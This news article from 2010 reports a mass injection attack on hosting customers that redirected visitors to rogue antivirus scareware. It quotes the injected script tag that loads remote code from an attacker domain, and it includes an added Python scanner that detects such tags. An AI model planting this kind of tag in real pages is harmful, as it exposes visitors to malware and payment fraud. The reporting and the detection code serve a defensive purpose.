A Mass Injection Attack Targeting Web Hosting Networks

Greatresponder.com – 2010-09-27 – According to data published by Websense (an e-mail and web security solution provider), a mass injection attack targeting web hosting companies is becoming a significant concern. Visitors to these hacked web sites are redirected to rogue anti-virus (AV) web sites.

The security firm states that the targeted web hosting providers are four well-known hosting firms: BlueHost, Bizland, Go Daddy and DreamHost.

Websense also states that in the first 7 days of September 2010, the number of affected web sites increased from 22,000 to nearly 39,000, depending on the day. Based on the information collected by Websense, BlueHost was by far the most affected web hosting provider, accounting for 38% of compromised web sites, followed by DreamHost with 28%. BizLand and Go Daddy took the third and fourth spots with 19% and 12% respectively.

Explaining the attack method, security researchers said that the attackers used similar injections to insert a script tag linking to a PHP script at the end of each hacked page, as shown:

<script src="http://www.kdjkfjskdfjlskdjf.com/js.php"></script></body>
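A defender-side check for the placement described above, as an added example that is not from Websense or the original article: it flags external script tags sitting directly before the closing body tag. The allowlist contents, function names and sample page are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption: edit per site).
ALLOWED_HOSTS = {"ajax.googleapis.com"}

# An empty <script src=...></script> directly before </body>, the placement the
# article describes. Accepts straight or typographic quotes around the URL.
TRAILING_SCRIPT = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"'\u201c\u201d]?([^\"'\u201c\u201d\s>]+)"
    r"[^>]*>\s*</script>\s*(?=</body\s*>)",
    re.IGNORECASE,
)

# Constructed sample page: one local script, then the tag quoted in the article.
SAMPLE = ('<html><body><p>Welcome</p><script src="/js/site.js"></script>\n'
          '<script src="http://www.kdjkfjskdfjlskdjf.com/js.php"></script></body></html>')

def find_injected_scripts(html, own_hosts=()):
    """Return external script URLs placed immediately before </body>."""
    trusted = {h.lower() for h in ALLOWED_HOSTS} | {h.lower() for h in own_hosts}
    hits = []
    for match in TRAILING_SCRIPT.finditer(html):
        url = match.group(1)
        host = (urlparse(url).hostname or "").lower()
        # Relative URLs have no host and are served by the site itself.
        if host and host not in trusted:
            hits.append(url)
    return hits

def scan_tree(root, own_hosts=(), suffixes=(".html", ".htm", ".php")):
    """Walk a web root and map each suspicious file to the URLs found in it."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = find_injected_scripts(text, own_hosts)
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    print(find_injected_scripts(SAMPLE))
```

Because the injection was appended to every page of an account, a non-empty report from `scan_tree` over the web root usually lists many files with the same URL.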

The external code checks whether the visitor has been attacked previously. If not, it redirects the visitor to web sites in the .co.cc domain space that show many bogus antivirus warnings typically associated with scareware campaigns.

According to the security specialists at Websense, the purpose of those false warnings is to persuade visitors to install rogue antivirus software, which then floods their computers with further false alerts to trick them into paying license fees.

Both malicious domain names linked with the attack (i.e. whereisdudescars.com and losotrana.com) were also involved in a similar mass compromise in July 2010.